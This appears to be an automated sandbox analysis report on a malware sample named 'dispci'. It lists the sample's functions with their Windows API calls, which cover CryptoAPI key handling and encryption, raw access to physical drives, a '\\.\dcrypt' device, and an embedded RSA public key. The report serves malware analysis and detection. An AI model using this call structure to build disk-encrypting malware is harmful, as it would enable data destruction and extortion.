                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Find$Path$CombineFile$CloseExtensionFirstMultipleNextObjectsWait
                                                                      • String ID: (V
                                                                      • API String ID: 1251538951-2915445117
                                                                      • Opcode ID: bad88251e8887346dab9b3f6586bbf8dc71f90d7f4ab97d2745e3fbbc5fe4299
                                                                      • Instruction ID: c0c854a108c1beca4fc0f71f88457280ea39d086adfee19874b07dc06129df02
                                                                      • Opcode Fuzzy Hash: bad88251e8887346dab9b3f6586bbf8dc71f90d7f4ab97d2745e3fbbc5fe4299
                                                                      • Instruction Fuzzy Hash: CB510075104209DAD720DF30CC45ABBB3B9EFA4754F4A8A28EA45D7094F732DA89CB71
                                                                      Function 00DF1080 Relevance: 13.6, APIs: 9, Instructions: 101encryptionmemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00DF10A4
                                                                      • LocalAlloc.KERNEL32(00000040,?,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00DF10B4
                                                                      • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00DF10D2
                                                                      • CryptDecodeObjectEx.CRYPT32(00000001,00000008,00000000,?,00000000,00000000,00000000,?), ref: 00DF10F8
                                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000001,00000000,?,00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00DF1104
                                                                      • CryptDecodeObjectEx.CRYPT32(00000001,00000008,00000000,?,00000000,00000000,00000000,00000000), ref: 00DF1122
                                                                      • CryptImportPublicKeyInfo.CRYPT32(00000000,00000001,00000000,?), ref: 00DF1133
                                                                      • LocalFree.KERNEL32(00000000,?,00000000,00000001,00000000,?,00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00DF113D
                                                                      • LocalFree.KERNEL32(00000000,?,00000000,00000001,00000000,?,00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00DF1144
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Crypt$Local$AllocBinaryDecodeFreeObjectString$ImportInfoPublic
                                                                      • String ID:
                                                                      • API String ID: 3940947887-0
                                                                      • Opcode ID: 69d8e0144446c73edf8718845fbd822a1e6f8924a056e3f33caf6785c08183a5
                                                                      • Instruction ID: a33af31dcc540dc31bb94eb420d90772e836ba6bcbdfc8b18252ae23028ec5b0
                                                                      • Opcode Fuzzy Hash: 69d8e0144446c73edf8718845fbd822a1e6f8924a056e3f33caf6785c08183a5
                                                                      • Instruction Fuzzy Hash: DC216175A41319BBE7208B96DC85FEFBB7CEB45B51F104055FB04A6280DAB19E4487B0
                                                                      Function 00DF39E0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 91fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __snwprintf.LIBCMT ref: 00DF3A0A
                                                                      • _malloc.LIBCMT ref: 00DF3A11
                                                                        • Part of subcall function 00DF5E86: __FF_MSGBANNER.LIBCMT ref: 00DF5E9F
                                                                        • Part of subcall function 00DF5E86: __NMSG_WRITE.LIBCMT ref: 00DF5EA6
                                                                        • Part of subcall function 00DF5E86: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00DFB13B,?,00000001,?,?,00DF9441,00000018,00E05D10,0000000C,00DF94D1), ref: 00DF5ECB
                                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000,00000000), ref: 00DF3A39
                                                                      • DeviceIoControl.KERNEL32(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 00DF3A6F
                                                                      • _free.LIBCMT ref: 00DF3AD6
                                                                        • Part of subcall function 00DF5E4C: HeapFree.KERNEL32(00000000,00000000,?,00DFA0A7,00000000,?,00DFB13B,?,00000001,?,?,00DF9441,00000018,00E05D10,0000000C,00DF94D1), ref: 00DF5E62
                                                                        • Part of subcall function 00DF5E4C: GetLastError.KERNEL32(00000000,?,00DFA0A7,00000000,?,00DFB13B,?,00000001,?,?,00DF9441,00000018,00E05D10,0000000C,00DF94D1,?), ref: 00DF5E74
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocControlCreateDeviceErrorFileFreeLast__snwprintf_free_malloc
                                                                      • String ID: \\.\PhysicalDrive%d
                                                                      • API String ID: 2774441620-2935326385
                                                                      • Opcode ID: 75ed28a3b5864a878315fc4d03aae6750b96b12af14e916cb06edcc8301da12d
                                                                      • Instruction ID: ca3fd72fea371ae3f3b768bb873907466d3199f34ecb2f739ed7f294fcebc027
                                                                      • Opcode Fuzzy Hash: 75ed28a3b5864a878315fc4d03aae6750b96b12af14e916cb06edcc8301da12d
                                                                      • Instruction Fuzzy Hash: A0318671A41708AFD724DF65EC46FBA77B8EB48710F01819DF649A72C0DB70AA448BB1
                                                                      Function 00DF15A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70encryptionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000), ref: 00DF15C0
                                                                      • GetLastError.KERNEL32 ref: 00DF15C6
                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008), ref: 00DF15DD
                                                                      • CryptDestroyKey.ADVAPI32(?), ref: 00DF162C
                                                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00DF1638
                                                                      Strings
                                                                      • MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxX, xrefs: 00DF15EB
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Crypt$Context$Acquire$DestroyErrorLastRelease
                                                                      • String ID: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxX
                                                                      • API String ID: 970883721-4244860603
                                                                      • Opcode ID: 403c590e98326b57fd2eabae9e966964cdb4f9594d2f7a1aa76fc0d3775c3ca1
                                                                      • Instruction ID: 42231c2cbd50d242cace5ebb1a3a9970d52ab6c21529f97bc7e2c1aa5e031603
                                                                      • Opcode Fuzzy Hash: 403c590e98326b57fd2eabae9e966964cdb4f9594d2f7a1aa76fc0d3775c3ca1
                                                                      • Instruction Fuzzy Hash: 2C11B175A0010DBBCB10DBA99C44EEEBBBCEF98740F198154FA05E7240DA319B498BB0
                                                                      Function 00DF1000 Relevance: 9.1, APIs: 6, Instructions: 52encryptionmemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000), ref: 00DF101F
                                                                      • CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000,?,00000004,?,00000000), ref: 00DF102D
                                                                      • CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004,?,00000000), ref: 00DF1040
                                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004,?,00000000), ref: 00DF1054
                                                                      • CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000,?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004,?), ref: 00DF1066
                                                                      • LocalFree.KERNEL32(00000000,?,00000001,00000000,00000000,?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004), ref: 00DF1069
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: CryptParam$Local$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 3966954206-0
                                                                      • Opcode ID: 28de026228d52fa45386b930d2c66d401b2d211da8018bee485d2fa71220d808
                                                                      • Instruction ID: cb35f2eeb6593e3d8e4da87ab4e6e4650a4ffe8cc79e7840f313a52b8ee6871a
                                                                      • Opcode Fuzzy Hash: 28de026228d52fa45386b930d2c66d401b2d211da8018bee485d2fa71220d808
                                                                      • Instruction Fuzzy Hash: 53012C71A41218BAE7209BA69C86FEEBB7CDB05B50F004055FB04A61C0DAB19E4486B5
                                                                      Function 00DF1160 Relevance: 7.6, APIs: 5, Instructions: 88encryptionmemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000000), ref: 00DF1197
                                                                      • LocalAlloc.KERNEL32(00000040,000000F0), ref: 00DF11A3
                                                                      • _memmove.LIBCMT ref: 00DF11BE
                                                                      • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,000000F0), ref: 00DF11DC
                                                                      • LocalFree.KERNEL32(?,?,000000F0), ref: 00DF11F9
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: CryptEncryptLocal$AllocFree_memmove
                                                                      • String ID:
                                                                      • API String ID: 3579331289-0
                                                                      • Opcode ID: 4fd2f356f3ef7cbc467aaf9c0acede53ff7ca3a0e952996122e10b47e60934d0
                                                                      • Instruction ID: 12091e1c8ebc265327207831b0678a654cfba59107d55af55f0df44b4a6a4fe8
                                                                      • Opcode Fuzzy Hash: 4fd2f356f3ef7cbc467aaf9c0acede53ff7ca3a0e952996122e10b47e60934d0
                                                                      • Instruction Fuzzy Hash: E621B076641229AFD7208A99DC45FBBB7ACEB8A760F154255FE08D7240D6719D0087F0
                                                                      Function 00DF5C9F Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsDebuggerPresent.KERNEL32 ref: 00DF681A
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00DF682F
                                                                      • UnhandledExceptionFilter.KERNEL32(00E03688), ref: 00DF683A
                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00DF6856
                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00DF685D
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                      • String ID:
                                                                      • API String ID: 2579439406-0
                                                                      • Opcode ID: 5ed183999f57e073fb3d2d8bb79528caedf563d772c083049356ae266b3eec62
                                                                      • Instruction ID: 9627dc5d97100f90a1928833cab2738dca36de612d089b04896f0d96da678e98
                                                                      • Opcode Fuzzy Hash: 5ed183999f57e073fb3d2d8bb79528caedf563d772c083049356ae266b3eec62
                                                                      • Instruction Fuzzy Hash: 8721BD744023049FD715EF6AFD846543BA4FB98310F90901EE948A6273E7B69AC8CF65
                                                                      Function 00DF1220 Relevance: 6.1, APIs: 4, Instructions: 62encryptionmemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CryptBinaryToStringW.CRYPT32(?,?,00000001,00000000,?), ref: 00DF1236
                                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,00000001,00000000,?), ref: 00DF1249
                                                                      • CryptBinaryToStringW.CRYPT32(?,?,00000001,00000000,?), ref: 00DF125E
                                                                      • LocalFree.KERNEL32(00000000,?,?,00000001,00000000,?,?,?,?,00000001,00000000,?), ref: 00DF1276
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: BinaryCryptLocalString$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 4291131564-0
                                                                      • Opcode ID: fd3262839be3830d4f742966fd36390e00f431263211b34b20148a1cf84034df
                                                                      • Instruction ID: f5be4ec63b54257e1376a6e35ee3ecabee8fcba0b04164e0a09d8ce5dcf0d71e
                                                                      • Opcode Fuzzy Hash: fd3262839be3830d4f742966fd36390e00f431263211b34b20148a1cf84034df
                                                                      • Instruction Fuzzy Hash: 65015676702118BBD720CAAAAC45DFBB7ADDBC5761B0541ABFD08D7200DA728E0596F0
                                                                      Function 00DF1D70 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00DF1D8D
                                                                      • CryptHashData.ADVAPI32(?,?,00000021,00000000), ref: 00DF1DA2
                                                                      • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000001,?), ref: 00DF1DBC
                                                                      • CryptDestroyHash.ADVAPI32(?), ref: 00DF1DC8
                                                                        • Part of subcall function 00DF1000: CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000), ref: 00DF101F
                                                                        • Part of subcall function 00DF1000: CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000,?,00000004,?,00000000), ref: 00DF102D
                                                                        • Part of subcall function 00DF1000: CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004,?,00000000), ref: 00DF1040
                                                                        • Part of subcall function 00DF1000: LocalAlloc.KERNEL32(00000040,00000000,?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004,?,00000000), ref: 00DF1054
                                                                        • Part of subcall function 00DF1000: CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000,?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004,?), ref: 00DF1066
                                                                        • Part of subcall function 00DF1000: LocalFree.KERNEL32(00000000,?,00000001,00000000,00000000,?,00000001,00000000,?,00000000,?,00000003,?,00000000,?,00000004), ref: 00DF1069
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Crypt$Param$Hash$Local$AllocCreateDataDeriveDestroyFree
                                                                      • String ID:
                                                                      • API String ID: 797921460-0
                                                                      • Opcode ID: 859d05f86ab274faf8e99d976038559796221cea729582f2c0e0648cebaaa74c
                                                                      • Instruction ID: a0ea2c55d6883f4ed9bde3452936cb8eecbc73449c8f291e375c132ff1f650bb
                                                                      • Opcode Fuzzy Hash: 859d05f86ab274faf8e99d976038559796221cea729582f2c0e0648cebaaa74c
                                                                      • Instruction Fuzzy Hash: 60018036700208BBD620CBA7EC48E6BB7BDFB84B51B154159F609E3140DA72AE0487B0
                                                                      Function 00DF12A0 Relevance: 6.0, APIs: 4, Instructions: 48encryptionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000), ref: 00DF12B7
                                                                      • GetLastError.KERNEL32 ref: 00DF12C1
                                                                      • CryptGenRandom.ADVAPI32(?,00000021), ref: 00DF12D5
                                                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00DF12E3
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Crypt$Context$AcquireErrorLastRandomRelease
                                                                      • String ID:
                                                                      • API String ID: 2963463078-0
                                                                      • Opcode ID: d7f07ab5dae3555f52f0cbb2c7b6b8873f480f06a4844fc4dc72c6f70a2038af
                                                                      • Instruction ID: 15935f2388b025d9a9a49471bfdeb125acf42bcd62bd4d3477ef51d0684d4fc5
                                                                      • Opcode Fuzzy Hash: d7f07ab5dae3555f52f0cbb2c7b6b8873f480f06a4844fc4dc72c6f70a2038af
                                                                      • Instruction Fuzzy Hash: ED01F735601284BBE7348BBB9C49F6BBBFDABCD700F24414DF649E3151D5728A41D624
                                                                      Function 00DF3FC0 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CallNextHookEx.USER32(00030068,00000000,?,?), ref: 00DF404B
                                                                        • Part of subcall function 00DF3D00: TlsGetValue.KERNEL32(?), ref: 00DF3D19
                                                                        • Part of subcall function 00DF3D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF3D31
                                                                        • Part of subcall function 00DF3D00: TlsSetValue.KERNEL32(?,00000000), ref: 00DF3D46
                                                                        • Part of subcall function 00DF3D00: DeviceIoControl.KERNEL32(00000000,00220020,00740000,00000000,00000000,00000000,?,00000000), ref: 00DF3D5E
                                                                        • Part of subcall function 00DF3D00: GetLastError.KERNEL32 ref: 00DF3D68
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Value$CallControlCreateDeviceErrorFileHookLastNext
                                                                      • String ID:
                                                                      • API String ID: 508842537-0
                                                                      • Opcode ID: b6a2b6ebde296ccadede50102f370e752639a10103054d6067abf0a7adea8375
                                                                      • Instruction ID: 5343165419451497b158def3ea021c12875f99571257a5f158b4bdbb4050bd0b
                                                                      • Opcode Fuzzy Hash: b6a2b6ebde296ccadede50102f370e752639a10103054d6067abf0a7adea8375
                                                                      • Instruction Fuzzy Hash: 2811A370A0021C9FD710DFAAEC84ABFBBB4FB58310F15842DEA45A7251CA359984CBB1
                                                                      Function 00DF4950 Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 191threadtimewindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00DF61C0: __lock.LIBCMT ref: 00DF61CE
                                                                        • Part of subcall function 00DF61C0: __getch_nolock.LIBCMT ref: 00DF61D8
                                                                      • GetDesktopWindow.USER32 ref: 00DF49C3
                                                                      • GetForegroundWindow.USER32 ref: 00DF49CB
                                                                      • GetShellWindow.USER32 ref: 00DF49D7
                                                                      • GetCapture.USER32 ref: 00DF49E3
                                                                      • GetClipboardOwner.USER32 ref: 00DF49EF
                                                                      • GetOpenClipboardWindow.USER32 ref: 00DF49FB
                                                                      • GetCurrentProcessId.KERNEL32 ref: 00DF4A07
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00DF4A13
                                                                      • GetTickCount.KERNEL32 ref: 00DF4A1F
                                                                      • GetFocus.USER32 ref: 00DF4A2B
                                                                      • GetActiveWindow.USER32 ref: 00DF4A37
                                                                      • GetKBCodePage.USER32 ref: 00DF4A43
                                                                      • GetCursor.USER32 ref: 00DF4A4F
                                                                      • GetLastActivePopup.USER32(?), ref: 00DF4A62
                                                                      • GetProcessHeap.KERNEL32 ref: 00DF4A6E
                                                                      • GetQueueStatus.USER32(000004BF), ref: 00DF4A7F
                                                                      • GetInputState.USER32 ref: 00DF4A8B
                                                                      • GetMessageTime.USER32 ref: 00DF4A97
                                                                      • GetOEMCP.KERNEL32 ref: 00DF4AA3
                                                                      • GetCursorInfo.USER32(?), ref: 00DF4ACE
                                                                      • GetCaretPos.USER32(?), ref: 00DF4ADB
                                                                      • GetCurrentThread.KERNEL32 ref: 00DF4AFD
                                                                      • GetThreadTimes.KERNEL32(00000000), ref: 00DF4B04
                                                                      • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 00DF4B23
                                                                      • GetProcessTimes.KERNEL32(00000000), ref: 00DF4B26
                                                                      • GetCurrentProcess.KERNEL32(00000028,00000028), ref: 00DF4B32
                                                                      • GetProcessMemoryInfo.PSAPI(00000000), ref: 00DF4B35
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00DF4B3F
                                                                      • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00DF4B49
                                                                      • EnumWindows.USER32(Function_00003DF0,00000117), ref: 00DF4BAD
                                                                        • Part of subcall function 00DF3D00: TlsGetValue.KERNEL32(?), ref: 00DF3D19
                                                                        • Part of subcall function 00DF3D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF3D31
                                                                        • Part of subcall function 00DF3D00: TlsSetValue.KERNEL32(?,00000000), ref: 00DF3D46
                                                                        • Part of subcall function 00DF3D00: DeviceIoControl.KERNEL32(00000000,00220020,00740000,00000000,00000000,00000000,?,00000000), ref: 00DF3D5E
                                                                        • Part of subcall function 00DF3D00: GetLastError.KERNEL32 ref: 00DF3D68
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentWindow$Thread$ActiveClipboardCursorInfoLastMemoryStatusTimesValue$CaptureCaretCodeControlCountCounterCreateDesktopDeviceEnumErrorFileFocusForegroundGlobalHeapInputMessageOpenOwnerPagePerformancePopupQueryQueueShellStateTickTimeWindows__getch_nolock__lock
                                                                      • String ID: ($@
                                                                      • API String ID: 2217453591-1311469180
                                                                      • Opcode ID: f8d2d1d3fb161a7edcd9ca52a3eb4d3fb3b34fb22b4820548ad213e8d6b2b1ef
                                                                      • Instruction ID: a6a14b2d8285d27f7764813cda8e09be1af99236a9a96014c2f85a246c2af725
                                                                      • Opcode Fuzzy Hash: f8d2d1d3fb161a7edcd9ca52a3eb4d3fb3b34fb22b4820548ad213e8d6b2b1ef
                                                                      • Instruction Fuzzy Hash: E3810B71C012289FDB20AF75DC487E9BBB8FB08301F058599E649A7261DB759AC8CF61
                                                                      Function 00DF49A8 Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 153threadtimewindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDesktopWindow.USER32 ref: 00DF49C3
                                                                      • GetForegroundWindow.USER32 ref: 00DF49CB
                                                                      • GetShellWindow.USER32 ref: 00DF49D7
                                                                      • GetCapture.USER32 ref: 00DF49E3
                                                                      • GetClipboardOwner.USER32 ref: 00DF49EF
